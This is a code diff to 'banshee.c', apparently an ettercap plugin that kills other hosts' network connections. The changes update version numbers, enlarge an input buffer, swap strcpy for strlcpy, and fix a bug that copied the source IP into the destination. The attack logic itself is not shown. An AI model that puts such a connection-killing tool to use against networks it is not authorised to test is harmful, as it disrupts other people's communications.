@@ -17,7 +17,7 @@
     along with this program; if not, write to the Free Software
     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 
-    $Id: banshee.c,v 1.3 2001/09/27 19:07:40 alor Exp $
+    $Id: banshee.c,v 1.6 2002/02/10 10:07:01 alor Exp $
 */
 
 #include <stdio.h>
@@ -52,7 +52,7 @@ int Banshee_ToBeKilled(int source, int psource, int dest, int pdest, KILLING *da
 struct plugin_ops ops = {
    ettercap_version: VERSION,
    plug_info:        "They kill without discretion...",
-   plug_version:     13,
+   plug_version:     15,
    plug_type:        PT_EXT,
    hook_point:       HOOK_NONE,
    hook_function:    &banshee,
@@ -85,7 +85,7 @@ int banshee(void *dummy)
    KILLING data;
    char c[1]="";
    char *buf;
-   char cont[5];
+   char cont[10];
 
 
    if (!strcmp(Host_Source.ip, ""))
@@ -96,7 +96,7 @@ int banshee(void *dummy)
    }
    else
    {
-      strcpy(source_ip, Host_Source.ip);
+      strlcpy(source_ip, Host_Source.ip, sizeof(source_ip));
    }
 
    if (!strcmp(Host_Dest.ip, ""))
@@ -107,17 +107,17 @@ int banshee(void *dummy)
    }
    else
    {
-      strcpy(dest_ip, Host_Source.ip);
+      strlcpy(dest_ip, Host_Dest.ip, sizeof(dest_ip));
    }
 
    IPS = inet_addr(source_ip);
    IPD = inet_addr(dest_ip);
 
-   memset(cont, 0, 5);
+   memset(cont, 0, 10);
 
    Plugin_Output("\nAre you sure you want to kill from %s:%d to ", int_ntoa(IPS), PS);
    Plugin_Output("%s:%d ? (yes/no) ", int_ntoa(IPD), PD);
-   Plugin_Input(cont, 4, P_BLOCK);
+   Plugin_Input(cont, 5, P_BLOCK);
    if (strncmp(cont, "yes", 3))  // not sure... ;)
    {
       Plugin_Output("\nIt is safe!  for now...\n");
